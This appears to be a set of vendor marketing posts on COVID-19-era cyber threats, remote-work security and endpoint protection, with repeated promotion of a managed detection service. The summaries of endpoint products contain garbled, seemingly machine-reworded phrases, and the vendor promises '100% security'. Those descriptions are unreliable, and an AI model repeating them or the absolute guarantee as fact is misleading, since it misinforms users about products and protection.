Forecasting Cyber Threats After The COVID-19 Pandemic

Forecasting Cyber Threats After The COVID-19 Pandemic

As the news changes on an almost daily basis, it’s difficult to know what to expect after the pandemic. Here is a review of the existing threats and how your company can prepare for the world during and after the pandemic. 

It is no secret that the COVID-19 pandemic is unprecedented health and economic crisis, affecting the wellbeing of employees. This pandemic has affected many businesses, as well as operations of businesses globally-but one that may have been overlooked by many is cybersecurity.

As a result of the coronavirus outbreak, cybercrimes have skyrocketed. Scammers are now launching fraudulent campaigns that cash in and feed off the cybersecurity gaps occasioned by emergencies and the necessity to adopt new working models.

In this post, we take a peek at the existing cyber threats, what to expect post the pandemic, and how your company can prepare for the inevitable. Let’s dig in:

Cybersecurity Risks in the COVID 19 Context

Some of the leading cyber crimes emanating from the COVID-19 crisis include:

Phishing attacks using the COVID-19 disease as bait

Fraudsters have been sending malicious emails impersonating government agencies and departments in charge of dispensing government-funded COVID-19 support initiatives. Such emails are usually designed to direct the recipient to a fake website where they are deceived to enter their personal and financial information.

Malware distribution using the pandemic as bait

Hackers have been leveraging human traits such as curiosity and concern around the coronavirus outbreak to deploy malware. In most cases, they send emails (with subject lines containing COVID-19-related phrases such as “Coronavirus Update”) that persuade the victim to download a malicious file from a website.

To create an impression of authenticity, the fraudsters spoof sender information in an email to make it look like it came from a trustworthy source, such as the World Health Organization (WHO).

Supply chain and remote working threats

As the pandemic ravages, governments have invoked several containment measures, such as social distancing and self/government-imposed quarantines, forcing companies to shift to remote working.

Fraudsters have taken advantage of this massive move to launch more attacks by exploiting various vulnerabilities in remote working tools. Since the recently deployed remote workers have had less training regarding the required security protections due to the current implementation rush, they are more prone to attacks.

Cybersecurity Risk Post-COVID 19

The COVID-19 outbreak is accelerating the trend towards telework, and we may see a more permanent shift towards telecommuting. As such, enterprises will continue facing the following challenges:

  • Telework will open multiple vectors for cyberattacks on employees due to increased use of personal devices and dependency on home and public networks.
  • Critical business assets will be at risk of being exposed to targeted and opportunistic cyberattacks by fraudsters and other malicious organizations seeking to exploit vulnerabilities and plant seed for possible future attacks.
  • Critical public sector services such as healthcare will continue to be under pressure and being hit hard with new types of ransomware, often aimed at disrupting connectivity and denial-of-service attacks.
  • Ransomware targeting supply-chains and online services will also be on the rise. Weakened organizations will be more vulnerable.

This begs the question: how will companies prepare for the inevitable?

A Robust Cybersecurity Response after COVID 19

Organizations will need to execute robust cybersecurity measures to prevent further crises. Beyond COVID-19, these seven areas will require attention.

#1. Teleworking solutions

Since we anticipate a permanent increase in telework, organizations should consider:

  • Procuring sufficient on-demand brandwidth to facilitate communication and content sharing, especially video conferencing across geographically dispersed sites.
  • Managing identity and access for remote staff to meet corporate security requirements as well as employees’ ease-of-use needs.
  • Deploying secure connectivity solutions to staff workstations such as internet protocol security (IPsec) – based VPN clients.

#2. External perimeter protection

Remote connections will undoubtedly increase an enterprise’s cyber-attack surface. Businesses may protect their external perimeters by:

  • Locking down staff workstations as well as company-based laptops with advanced security settings. This includes managing configurations centrally, and not giving administrative privileges to end-users.
  • Deploying network access control (NAC) as a solution that will help authenticate and validate devices, as well as enforce security policies before allowing them to connect to company networks.
  • Deploying solutions that enable remote endpoint data collection and analysis to help identify unauthorized activity.

#3. Cloud services

Cloud services offer many benefits over data storage and application hosting alternatives. Besides monitoring cloud usage within the enterprise, they enforce related cybersecurity policies and guard against malware. To enjoy these benefits cloud services need to be strategically adopted and managed. Companies should consider:

  • Adopting formal strategies for the use of cloud services.
  • Defining data storage regulations outlining the requisites for the use of cloud services, data center storage, and local storage, especially for crucial information.

#4. Secure collaboration tools

Video conferencing, email and office productivity tools have been very useful during the pandemic. Companies may choose to:

  • Adopt and use additional secure collaboration tools
  • Explore emerging technologies like virtual reality and chatbots for content delivery

#5. Cybersecurity policy

Organizations should consider conducting a risk assessment and establish enforcement mechanism such as:

  • Single sign-on
  • Automatic logout from unattended devices
  • Multi-factor authentication

# 6. Supply chain and third-party management

The pandemic may make it necessary for your supply chain associates to change their business model. Organizations should consider:

  • Reviewing third-party agreements -for instance, IT providers – to ascertain that they meet the latest requirements and have acceptable liability provisions.
  • Conducting regular cybersecurity audits for all third parties with authorized access to the company network, data, or systems.

#7. Cyber-attack financial protection and recovery

Companies should consider cyber insurance, which can come in handy as a cost-effective financial backstop should they experience a cyber-attack. Enterprises need to:

  • Review their current insurance coverage to identify potential gaps
  • Examine how emerging cybersecurity challenges may fit into the enterprise’s cyber risk transfer strategy
  • Examine possible changes in coverage terms and conditions at renewal. As insurers assess losses post-pandemic, they may change in claim patterns.

Consider MDR

In the midst of the pandemic, this monitored service for endpoints has become a priority for many organizations. Antivirus on endpoints is not enough to protect your corporate data. The fact is that cyberattacks on endpoints are increasing rapidly in complexity and numbers. MDR includes the ability to stop threats before they are able to do any harm. Plus with a team of security analysts watching your systems 24/7, we’ll help you remediate any issues that may occur. 

Learn more about MDR from Cybriant here. 

Final thoughts

The pandemic has brought a new era in cybersecurity and IT experts that will raise their game in protecting their companies during this crisis period will be crucial in the re-opening of the economy. Enterprise managers need to keep an eye on the medium and long term, recognizing that telecommuting may become the norm for a majority of the workforce long after the pandemic has ended.

While educating the remote workforce about cybersecurity best practices is a great move, it’s not enough. The cornerstone for success lies in deploying technologies that are effective and quick to adopt.

At Cybriant, we help brands like you implement strategies that will increase your breadth and depth of security protection rapidly. 

Free 30-Day Trial of MDR

Learn More

6 Enterprise Security Tips for Remote Workers

6 Enterprise Security Tips for Remote Workers

The COVID-19 pandemic ushered in a rapid change to the way in which many people work. Here are 6 ways to ensure enterprise IT security. 

enterprise it security

White-collar workers have mostly shifted to working remotely from their own homes. Some enterprises facilitated remote work arrangements before the pandemic, but this mode of working is now the norm.

The rapid shift to remote work brings many new security challenges to enterprise IT departments. The perimeter of the corporate network extends to the devices people use at home to connect to the network and do their work.

6 Steps to Ensure Enterprise IT Security

Here are six tips to make sure that your organization’s IT security defenses remain strong regardless of where your employees work from.

#1. Protect All Endpoints

Having the majority of your workforce working remotely leads to a large increase in the number of endpoint devices on your network. Whether your business opts to give employees company-certified laptops or you allow workers to connect to the network from their own devices, it’s imperative to protect these endpoints.

One option for endpoint protection is to use dedicated enterprise endpoint protection software and have it installed on every endpoint device. Another option is to mandate that employees have up-to-date anti-virus software installed on their personal devices before they can connect to the corporate network.

This can be overwhelming to IT departments, which is why we have created a service called Managed Detection and Remediation (MDR). MDR from Cybriant will help reduce the time between breach and detection, we can also help stop the threat before it can fully execute. Learn more here: cybriant.com/mdr. 

#2. Properly Secure RDP Ports

It’s common for businesses to use remote desktop connections to give employees remote access to the same desktop workstation they would normally use on-premise. Remote workers can access remote desktops using the proprietary Remote Desktop Protocol (RDP). Cybercriminals frequently look for open RDP ports in an attempt to gain brute force access to remote desktops inside corporate networks.

To properly secure RDP ports, make sure that employees use strong passwords of at least 12 characters to connect to remote desktops. Another important step is to enable automatic updates so that any vulnerabilities in the remote access software are fixed as soon as patches become available.

Organizations may consider VPN as an option. Here is a helpful guide on how to be safe using VPN. 

#3. Use Multi-Factor Authentication

Multi-factor authentication adds an additional layer of protection to your IT security environment on top of a strong password policy. With multi-factor authentication, employees can only gain access to systems if they give two or more pieces of identification while signing in. The most practical use of multi-factor authentication is to require a standard username and password combination in addition to a dynamic one-time passcode that only remains valid for one login session.

We consider this a basic of enterprise security. Download our Remote Workers Guide to receive all the remote working tips from Cybriant’s CTO. 

#4. Inform Employees of Security Risks

IT departments commonly regard employees as weak links in the context of evaluating enterprise IT risks. Remote work exposes employees to more IT security threats than usual, and it’s harder for enterprises to mitigate these threats.

A good way to protect employees against security threats while remote working is to promote awareness of the threats they face. Consider distributing an internal memo that identifies the main threats criminals use to gain access to networks, such as phishing and social engineering. You could also ask employees to repeat any IT security awareness training modules that your company offers.

While awareness is important, we prefer to go back to #1 – ensure the protection of endpoints. If you had a team of security experts watching your endpoints 24/7 – you have the ability to protect your corporate data no matter what. Learn more about MDR here: cybriant.com/mdr. 

#5. Secure Your Video Conferences

It’s important for businesses to maintain face-to-face communication and hold team meetings while people work from home. Video conferencing tools are popular choices for remote work, but this type of software can come with IT security risks.

It’s crucial to make an effort to secure all video conferences held by different teams and departments in your organization. Require passwords to gain access to video calls, and make sure your chosen tool has an alert feature that lets you know when someone new joins the conversation. You should also apply updates to your video conferencing software as soon as they are released.

#6. Protect Your Digital Assets

Your enterprise probably has many assets stored digitally on its network, including marketing materials, website content, illustrations, business plans, and presentations. A significant attack vector for hackers to gain access to valuable digital data is by stealing the credentials of an employee who has privileged access to more assets than they need for their daily work.

A vital measure to protect your digital assets is to enforce least privilege controls on all user accounts. The principle of least privilege minimizes user access permissions to only the assets they need to perform their daily work.

These decisions are easier made when you have a security framework in place, like NIST-CSF. Learn more about the importance of people, process, and technology here. 

Closing Thoughts

The flexibility to work remotely some of the time was becoming an important part of what white-collar workers expected from enterprises. The COVID-19 pandemic rapidly altered the dynamics of remote work such that it is now the status quo. By following IT security best practices and tips for remote workers, you can ensure your corporate network and valuable assets remain protected in a new threat landscape.

pretect Many organizations prefer a simple, all-in-one solution to help promote their cybersecurity goals. We have created the perfect solution in our integrated service, PREtect.

Learn more here: cybriant.com/pretect. 

 

 

 

30-Day MDR Free Trial

Could an Endpoint Security Service Be Your Secret Cybersecurity Weapon?

Could an Endpoint Security Service Be Your Secret Cybersecurity Weapon?

Should you use an endpoint security service? The quick answer is yes, especially if your workers are accessing any corporate data on potentially unsecured endpoints. Read more about how this simple service could be your secret cybersecurity weapon. 

endpoint security service

I was recently reading over the Forbes article, “Why Securing Endpoints Is The Future Of Cybersecurity” with some very interesting insights from Verizon’s 2020 Data Breach Investigations Report (DBIR). According to the article: 

Verizon’s DBIR reflects the stark reality that organized crime-funded cybercriminals are relentless in searching out unprotected endpoints and exploiting them for financial gain, which is why autonomous endpoints are a must-have today.

 

After reading the 2020 Verizon DBIR, it’s clear that if organizations had more autonomous endpoints, many of the most costly breaches could be averted. Autonomous endpoints that can enforce compliance, control, automatically regenerating, and patching cybersecurity software while providing control and visibility is the cornerstone of cybersecurity’s future. 

 

For endpoint security to scale across every threat surface, the new hybrid remote workplace is creating an undeletable tether to every device as a must-have for achieving enterprise scale.

 

The lack of diligence around Asset Management is creating new threat surfaces as organizations often don’t know the current health, configurations, or locations of their systems and devices. Asset Management is a black hole in many organizations leading to partial at best efforts to protect every threat surface they have. What’s needed is more insightful data on the health of every device.

What is an Endpoint Security Service? 

When you outsource your endpoint security service, you have a team of security analysts that monitor your endpoints 24/7 and filter out false positives. You’ll receive the alerts when relevant threats are detected along with advice and insight from our cybersecurity to help you mitigate and respond to the threat.

MDR or Managed Detection and Remediation is what we have named our endpoint security service. As an extension of your team, our experts will investigate, triage, and remediate security events and provide executive-level reporting. Remediation may reveal dormant or trojan threat actors that evade network and endpoint detection solutions. Our MDR solution includes leveraging the talents of our experienced team as well as next-generation antivirus and EDR tools that utilize AI.

The MDR service from Cybriant will allow you to protect your organization’s data and reduce your threat landscape against the most advanced threats. 

What is an endpoint? 

To put it simply, an endpoint is any device that communicates with the network in which it is connected. Here are some examples of endpoints: 

  • Laptops
  • Desktops
  • Mobile Phones
  • Tablets
  • Servers
  • Virtual Environments

What is the goal of endpoint security? 

According to Gartner, “Organizations investing in endpoint security tools are purposefully moving from an ‘incident response’ mentality to one of ‘continuous monitoring’ in search of incidents that they know are constantly occurring.”

Why do we need endpoint security?

Cybercriminals are leveraging advanced attack toolsets and techniques that can bypass most perimeter security solutions. The tools and techniques that cybercriminals use have outpaced the capabilities of many traditional endpoint security solutions as well. MDR is a cybersecurity technology that addresses the need for continuous monitoring and response to advanced threats.

What is the difference between endpoint security and antivirus?

Endpoint security differs from antivirus in that antivirus cover one single endpoint. Endpoint security covers your entire network and protects against security attacks.

Why outsource the monitoring of endpoint security? 

While endpoint security is a powerful tool that addresses the need for continuous monitoring and response to advanced threats, this tool is often difficult to deploy, manage, and monitor particularly at scale in large to mid-sized organizations.

With Managed Detection and Remediation (MDR), you have a team of endpoint security experts not only utilizing next-generation tools on your behalf, but they are also feeding back information to your organization on how to respond to alerts.  Cybriant’s security team brings together endpoint analysts, incident responders, forensics experts, and security engineers. They understand what normal endpoint activity should look like, when a more thorough investigation is required when to raise the alarm, and how to respond.

FREE 30-Day Trial of MDR from Cybriant

Best Endpoint Protection Tools of 2020

Best Endpoint Protection Tools of 2020

You already know that the traditional antivirus system is not enough to secure your network from cyber-attacks. Consider these endpoint protection tools for enterprise-level protection of your endpoints. 

endpoint protection

Through our MDR service, Cybriant offers endpoint protection to secure all the endpoints connected to your IT network from cyber threats. Endpoints are the devices i.e. smartphones, tablets, desktops, laptops, servers, or any other I/O device connected to the respective network, acting as the terminal point of the network.

Endpoints connected remotely, having access to a network might create a loophole in your network for the hackers to break into your network. Endpoint Protection tools monitor and scan every device over the network. Endpoint protection makes sure that all your endpoints are secure and your network is free from any kind of malware threat by blocking cynical and malicious endpoints to access your network.

Cybriant Managed Detection and Remediation (MDR) services allow you to monitor, install antivirus, add firewall and enterprise IT perimeters to secure your endpoints, and to protect your business network from the rising wave of cybersecurity threats.

MDR vs. Antivirus: What is the Difference?

Both Managed Detection and Remediation (MDR) and Antivirus are used to ensure the security of your endpoints. Before going to choose from one of them, you must know everything in detail about these programs and what amenities they provide to protect your endpoints. Which is best, and why should you go to utilize one?

What is Antivirus?

Antivirus software is a traditional program used to detect and remove malware like viruses, keyloggers, trojans, worms, ransomware, adware, and many more.

Newly launched and upcoming malware is becoming more and more advanced. Hackers are designing malware so it avoids detection by traditional antivirus.  Antivirus programming is accessible as an independent arrangement or as one part of an endpoint assurance stage.

Features of antivirus:

  • Web Protection
  • Alert notification
  • Real-time scanning option
  • Threat identification

Antivirus protects only individual devices and is auspicious if you’re administering a small start-up.

What is Managed Detection and Remediation (MDR)?

MDR is the most advanced and reliable system, which is the combination of technology and innovation, provides services to detect malicious activity on web networks to developing companies and organizations. Cybriant offers managed detection and response (MDR) service to overcome the cyber attack by reducing the time to detect and suggesting useful remediation as soon as possible.

The cybersecurity research team of Cybriant monitors your network 24/7. To secure your business, we provide timely response to malicious activity and great remediation strategies to protect your valuable computer network data, including servers, mobile devices, and desktops from incursions and malware attacks. We assure you 100% security and defend your network against most advanced threats.

Importance Of Endpoint Security

As remote working is increasing rapidly, hackers have numerous opportunities to attack their victims to steal their essential data from the loopholes that exist in the network. With the increase of endpoints like laptops, smartphones, tablets, and other mobile devices, so the risk of losing data is also increasing day by day.

Hackers are always coming up with new ways to gain access to web networks to steal priceless information or manipulate employees into giving out perceptive data. To get rid of all these stumbling enigmas and to keep secure sensitive data of your organization, it’s essential to protect any and all endpoints that are connected to your corporate networks.

Top Five (5) Enterprise Endpoint Protection Tools of 2020:

  • Bitdefender: If you want reliable security for your organization, then Bitdefender Gravity Zone Business Security enterprise must be in your shortlist. It allows you to use the extensive command, and also powerful detection inclinations.
  • SentinelOne: SentinelOne is most advanced and all in one endpoint security software and AI platform. It is from the company of the same name, presenting a combined antivirus and EDR solution system. Cybriant is also using this superior endpoint protection tool, which offers real-time forensics to deliver investigative abilities and multiple performance detection methods.
  • ESET Endpoint Security: ESET endpoint protection is a prominent advantage for small to medium size businesses. It provides a unique remote management system for the progress of the diminutive business without any interruption related to the security of endpoints.
  • Symantec Endpoint Protection: Symantec offers a completely highlighted endpoint assurance arrangement, with the continued threat of prevention capacities, including documenting less assault insurance, upgraded portable application security, and insurance for cloud-associated clients. Symantec gets acknowledgment as an intensive competitor of malware arrangements around the world.
  • CrowdStrike Falcon: CrowdStrike Falcon endpoint solution covers Windows web network and servers just as Mac PCs, Smart Phones, and Tablets regardless of whether on or off the system and joins EDR and hostile to malware into an individual agent. It also offers the visibility of real-time detection of malicious activity.

Why should you choose Cybriant for Endpoint protection?

As already mentioned above, we are using the most advanced SentinelOne technology tools to provide you with impeccable endpoint security with the help of AI Managed Detection and Response (MDR), EDR, and next-generation antivirus solutions.

Cybriant cybersecurity analyst team monitoring you 24/7 and also transmits a quick notification when an intelligence threat and anonymous activity try to breach security. Besides this, our experienced team also provides you response and remediation to deal with anonymous intimidation.

MDR services help to meet the growing challenges of enterprise threats and protection. It allows you to secure your organization’s sensitive records and also diminish the attack of an unknown attack.

Are Managed Detection and Remediation Services for You?

How to Stop Hackers That Are Exploiting Coronavirus Panic

How to Stop Hackers That Are Exploiting Coronavirus Panic

In a recent Hacker News story, it was revealed how hackers are exploiting the coronavirus panic. Here are some ways to help prevent those hacks from destroying your business.

Hacker News revealed 7 ways that hackers are exploiting our fears around the Coronavirus. Research is showing that attackers are using Coronavirus-specific lures to reach potential targets.

The attack surface is changing and expanding rapidly as many organizations and business tasks are going digital without much preparation, exposing themselves to more potential threats.

Most of the recent cyberattacks are primarily exploiting the fears around the COVID-19 outbreak-fueled by disinformation and fake news-to distribute malware via Google Play apps, malicious links and attachments, and execute ransomware attacks.

The World Health Organization has seen its share of cyber scammers. See their warning here. We’ve reviewed several ways to defend your enterprise while working from home as well as released a remote worker’s guide.

Here are the 7 ways that hackers are exploiting the Coronavirus panic.

  1. Mobile Malware
  2. Email Phishing
  3. Discounted Off-the-Shelf Malware
  4. SMS Phishing
  5. Face Mask and Hand Sanitizer Scams
  6. Malicious Software
  7. Ransomware Attacks

The United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC) released a joint alert titled COVID-19 Exploited by Malicious Cyber Actors.

Advanced Persistent Threat (APT) groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and “hack-and-leak” operations.

Cybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.

Both APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. Threats observed include:

  • Phishing, using the subject of coronavirus or COVID-19 as a lure,
  • Malware distribution, using coronavirus- or COVID-19- themed lures,
  • Registration of new domain names containing wording related to coronavirus or COVID-19, and
  • Attacks against newly-and often rapidly-deployed remote access and teleworking infrastructure.

How Can You Protect Your Organization?

 

In our recently released Remote Workers Guide, our CTO Andrew Hamilton describes all the ways Cybriant is protecting our organization while we are working from home because of the COVID-19 outbreak in the US.

In this guide, we discuss tips to secure personal devices and the exact steps to take if you think you have been compromised. Our team deals with highly sensitive data and our remote workers must be vigilant when working remotely. Download the guide and see what steps we’ve taken to prevent our team from cyber attacks.

You’ll also be interested to learn the types of cyber attacks you may see while working from home. Download the guide today and let Cybriant assist your organization during this unique time in our lives.

Recommendations from Cybriant

We typically recommend starting with an assessment so our team has a better grasp of where you are in your security strategy. We offer all assessments including:

  • Risk Assessment
  • Gap Analysis
  • Penetration Test
  • Mobile Security Risk Assessments

Find out more about our assessments here.

Mobile Security Risk Assessment

Our comprehensive mobile security risk assessment will allow you to evaluate the risk presented to the organization by mobile phones and tablets, evaluate potential omissions in policies, documentation, and implementation. This assessment will also help evaluate the impact of mobile device policy on diverse geographic and economic user groups. Plus, we’ll be able to recommend actions to better secure and align mobile devices to business practices.

Our comprehensive mobile security risk assessment will include the following:

  • Evaluate risk presented to the organization by mobile phones and tablets
  • Evaluate potential omissions in policies, documentation, and implementation
  • Evaluate the impact of mobile device policy on diverse geographic and economic user groups
  • Recommend actions to better secure and align mobile devices to business practices

This is an incredibly important step to take while your enterprise is working from home. Learn more about our Mobile Security Risk Assessment here.

Managed Detection and Remediation (MDR)

Antivirus isn’t enough to protect your endpoints.

The fact is that cyberattacks on endpoints are increasing rapidly in complexity and numbers. With digitization continuing to transform industries, devices in huge numbers are likely to be compromised.

To mitigate the risk of compromised systems, you need an immediate response, enhanced security tools, and a team of experts on your side that can guide you through the entire remediation process.

With MDR from Cybriant, our security analysts monitor your endpoints 24/7 and filter out false positives. You’ll receive the alerts when relevant threats are detected along with advice and insight from our cyber security team to help you mitigate and respond to the threat.

Learn more about MDR from Cybriant.

Mobile Threat Defense

Corporate infrastructures have been venturing into the BYOD (Bring Your Own Device) world for years often without knowing it. Conditional restrictions are often not in place to prevent access to corporate data reposited in email, SharePoint, calendaring, corporate contacts, and other applications. And even in cases where conditional restrictions may exist, the usage of mobile threat defense software may not be present or utilized on the device.

Contrastingly companies will often stringently secure their corporate laptops and desktops with MDR solutions, SIEM agents, and vulnerability management solutions. The difference in approaches to BYOD devices versus corporate-managed devices is troubling because BYOD devices can often access the same confidential data but without similar safeguards. With the recent string of major vulnerabilities discovered in both the Android and Apple iOS ecosystems, it’s becoming more apparent that any device that can access corporate data is a potential avenue for attack.

With two levels of service, Cybriant’s Mobile Threat Defense (MTD) service is an affordable way to protect the majority of your workforce, contractors, and BYOD users. It provides a baseline of protection and assurance that your mobile devices will be secured against common threats and attack vectors.

Learn more about our Mobile Threat Defense offerings

Managed Mobile Threat Defense Offerings

Defending Your Enterprise While Working from Home

Defending Your Enterprise While Working from Home

With the proper tools and techniques in place, it’s possible to continue to defend your enterprise while your staff is working from home. Here are some good points to remember and share about securing mobile devices.

defend your enterprise

Now More Than Ever: Hackers Want Endpoints

Hackers understand the global pandemic we are currently experiencing. They also know that whatever you are NOT focused on defending, and they will flow like water to get to it.

Where are you not focused as a defender? That’s where the hacker will go.

Since working remotely has been mandated to slow the spread of COVID-19, focus on your users’ endpoints.

According to the 2019 Data Breach Investigations Report, 94% of all attacks start with email. Be aware that even more users will click on malicious links when they are using their mobile devices.

Mobile Devices Users are More Vulnerable to Phishing Attacks

According to a recent mobile phishing report, there is an 85% increase annually on the rate at which people are falling for phishing attacks on mobile.

Mobile devices are connected outside traditional firewalls, typically lack endpoint security solutions, and access a plethora of new messaging platforms not used on desktops. Additionally, the mobile user interface does not have the depth of detail needed to identify phishing attacks, such as hovering over hyperlinks to show the destination.

As a result, mobile users are three times more likely to fall for phishing scams, according to IBM.

Finally, the huge amount of personal and corporate data on mobile devices is making these devices the preferred target for phishing attacks.
In fact, in spite of being protected by traditional phishing protection and education, 56% of Lookout users received and tapped a phishing URL on their mobile device between 2011–2016. Fortunately, in these cases the attack was thwarted by Lookout.

Before enterprises can achieve comprehensive protection against phishing attacks across all vectors, including the mobile device, security and IT professionals need to understand how current phishing myths muddy the waters and get the facts that will help them make informed decisions on how to protect corporate data.

Source

Hackers’ Capabilities

It’s difficult for users to keep up with the hacker’s capabilities. As a corporation, you could potentially have a team of security experts on hand that are able to research those capabilities and be able to help you put a defense strategy in place. Attackers are using the following tools to breach your mobile devices:

Remote Access Trojans (RAT)

A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. RATs are usually downloaded invisibly with a user-requested program — such as a game — or sent as an email attachment. Once the host system is compromised, the intruder may use it to distribute RATs to other vulnerable computers and establish a botnet. Source

Web Shells

A web shell is a script that can be uploaded to a web server to enable remote administration of the machine. Infected web servers can be either Internet-facing or internal to the network, where the web shell is used to pivot further to internal hosts.

A web shell can be written in any language that the target web server supports. The most commonly observed web shells are written in languages that are widely supported, such as PHP and ASP. Perl, Ruby, Python, and Unix shell scripts are also used. Source

Mimikatz

Mimikatz is a leading post-exploitation tool that dumps passwords from memory, as well as hashes, PINs and Kerberos tickets. Other useful attacks it enables are pass-the-hash, pass-the-ticket or building Golden Kerberos tickets. This makes post-exploitation lateral movement within a network easy for attackers. Source

Powershell Empire

PowerShell Empire is a unique attack framework in that its capabilities and behaviors closely resemble those used by current nation-state advanced persistent threat actors.

Nation-state hacking groups were using PowerShell to create fileless malware that runs in a computer’s memory, without leaving any traces on disk, and using PowerShell scripts as a post-exploitation vector for moving through networks and inside workstations without triggering any security alerts.

Because PowerShell is installed by default on all Windows 7 and later versions, at the time, the app was trusted by all security products, many of which did not detect Powershell-based attacks.

Empire’s use among cybercriminals has grown so much in the past few years that in late 2018, the UK’s National Cyber Security Center included Empire on its shortlist of the five most dangerous publicly available hacking tools — together with JBiFrost, Mimikatz, China Chopper, and HTran. Source

C2 Obfuscation Tools

Attackers will often want to disguise their location when compromising a target. To do this, they may use generic privacy tools (e.g., Tor) or more specific tools to obfuscate their location.

HUC Packet Transmitter (HTran) is a proxy tool used to intercept and redirect Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to obfuscate an attacker’s communications with victim networks. The tool has been freely available on the internet since at least 2009.

HTran facilitates TCP connections between the victim and a hop point controlled by a threat actor. Malicious threat actors can use this technique to redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts in a network. Source

How to Protect Mobile Devices for Remote Workers

For a comprehensive mobile device protection strategy, you need a tool or service for endpoints that can offer a form of antivirus, an EDR-type tool that can record and log instances for future forensics, as well as vulnerability management for mobile.

Your mobile device security strategy should provide phishing protection for:
– Email
– SMS
– Social Media
– Messaging Apps

You should also consider Mobile Threat Defense that defends against:
– Application Threats
– Device Threats
– Network Threats

Managed Detection and Remediation (MDR) for Endpoint Security

Not only does MDR from Cybriant help reduce the time between breach and detection, we can also help stop the threat before it can fully execute.

Our experts utilize a static AI engine to provide pre-threat execution protection. The static AI engine replaces traditional signatures and obviates recurring scans that kill end-user productivity.

By tracking all processes, our team is able to detect malicious activities, and use behavioral AI technology to respond at top speed. We can detect and stop file-based malware, scripts, weaponized documents, lateral movement, file-less malware, and even zero-days.

With MDR from Cybriant, our security analysts monitor your endpoints 24/7 and filter out false positives. You’ll receive the alerts when relevant threats are detected along with advice and insight from our cyber security team to help you mitigate and respond to the threat.

As an extension of your team, our experts will investigate, triage, and remediate security events and provide executive-level reporting. Remediation may reveal dormant or trojan threat actors that evade network and endpoint detection solutions. Our MDR solution includes leveraging the talents of our experienced team as well as next-generation antivirus and EDR tools that utilize AI.

The MDR service from Cybriant will allow you to protect your organization’s data and reduce your threat landscape against the most advanced threats.

Security Fundamentals for Working Remotely

Consider sharing this information from Infragard to all your remote workers. Stay up-to-date on Coronavirus scams here.

Cyber Risks/Criminals: The FBI reports scammers are leveraging the COVID-19 pandemic to steal your money and your personal information, or both. Protect yourself and do your research before clicking on links purporting to provide information on the virus; donating to a charity online or through social media; contributing to a crowdfunding campaign; purchasing products online; or giving up your personal information to receive money or other benefits.

The FBI advises you to be on the lookout for the following:

FAKE CDC EMAILS – Watch out for emails claiming to be from the Centers for Disease Control and Prevention (CDC) or other organizations claiming to offer information on the virus. Do not click links or open attachments you do not recognize. Fraudsters can use links in emails to deliver malware to your computer to steal personal information or to lock your computer and demand payment. Be wary of websites and apps claiming to track COVID-19 cases worldwide. Criminals are using malicious websites to infect and lock devices until payment is received.

PHISHING EMAILS – Look out for phishing emails asking you to verify your personal information to receive an economic stimulus check from the government. While talk of economic stimulus checks has been in the news cycle, government agencies are not sending unsolicited emails seeking your private information to send you money. Phishing emails may also claim to be related to charitable contributions, general financial relief, airline carrier refunds, fake cures and vaccines, and fake testing kits.

COUNTERFEIT TREATMENTS OR EQUIPMENT – Be cautious of anyone selling products that claim to prevent, treat, diagnose, or cure COVID-19. Be alert to counterfeit products such as sanitizing products and Personal Protective Equipment (PPE), including N95 respirator masks, goggles, full face shields, protective gowns, and gloves. More information on unapproved or counterfeit PPE can be found at www.cdc.gov/niosh. You can also find information on the U.S. Food and Drug Administration website, www.fda.gov and the Environmental Protection Agency website, www.epa.gov. Report counterfeit products at www.ic3.gov and to the National Intellectual Property Rights Coordination website at iprcenter.gov

Best Practices for Companies: Attached is a one-page document, developed by InfraGard National Board Director Rusty Sailors and his company, listing best cyber practices for companies to adopt, to ensure their information is kept safe and secure at all times.

In addition to those recommendations, the FBI is reminding people to always use good cyber hygiene and security measures. By remembering the following tips, you can protect yourself and help stop criminal activity:

  • Do not open attachments or click links within emails from senders you don’t recognize.
  • Do not provide your username, password, date or birth, social security number, financial data, or other personal information in response to an email or robocall.
  • Always verify the web address of legitimate websites and manually type them into your browser.
  • Check for misspellings or wrong domains within a link (for example, an address that should end in a “.gov” ends in “.com” instead

As the world is responding to the global response for remote work options, we’re here to provide guidance and stability during these trying times.

Whether provisioning corporate laptops or allowing employees to use personal devices, hastily extending a remote work option can leave your organization vulnerable in terms of security.

Here are a few items to consider:

Remote Basics
– A computer
– A secure internet connection
– Chat and conferencing applications
– A dedicated workspace
– A phone and a camera
– Self-motivation and discipline
– A strict routine

Require VPN access for internal networks
A VPN encrypts your corporate traffic to avoid man-in-the-middle attacks or eavesdroppers

Update Password Policies
Make sure your employees understand and comply with your password policies. This might be the best time to start with new strong passwords across the company.

Separate User Account
If your group in using their own devices, require a new user account to be set up for work use only. This separation will help both privacy and security.

Invest in full-featured endpoint security for home workers
Home systems are varied and more often than not, are not up to the job of protecting your company’s assets. The best options would still be business-class endpoint security that can be managed by your IT team that leverages a firewall, protection from malicious websites, and malware.

Require multi-factor authentication
Your best defense against cyber criminals that may utilize brute-force techniques or stolen credentials.

Require encryption
If employees are working on sensitive files or downloading files to their personal devices, provide an encryption solution while requiring separation of personal files.

Keep machines up to date
It is difficult to know how well employees keep their home machines up to date. Enable automated updates on all of their systems to be sure they are current with all security measures.

Employee Training
COVID-19 Scams are on the rise and are becoming more sophisticated. Remote workers’ habits and behaviors can become lax when it comes to clicking on links. Provide a refresher to help avoid the human element that cybercriminals attempt to exploit. Consider running a campaign and training course before employees begin working remotely or shortly thereafter.

Free Offer: MDR Access